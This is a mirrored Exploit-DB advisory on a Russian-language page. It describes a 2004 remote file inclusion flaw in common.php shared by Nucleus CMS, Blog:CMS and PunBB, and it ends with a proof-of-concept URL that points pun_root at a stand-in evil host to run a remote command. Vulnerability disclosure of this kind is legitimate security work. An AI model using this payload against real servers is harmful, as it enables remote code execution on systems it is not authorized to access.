- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24296
- Проверка EDB
-
- Пройдено
- Автор
- RADEK HULAN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2004-07-20
Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion
Код:
source: https://www.securityfocus.com/bid/10760/info
Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.
Input passed to the 'common.php' script is not sufficiently sanitized.
All three applications are vulnerable because they have a similar or identical code base.
http://www.example.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id- Источник
- www.exploit-db.com
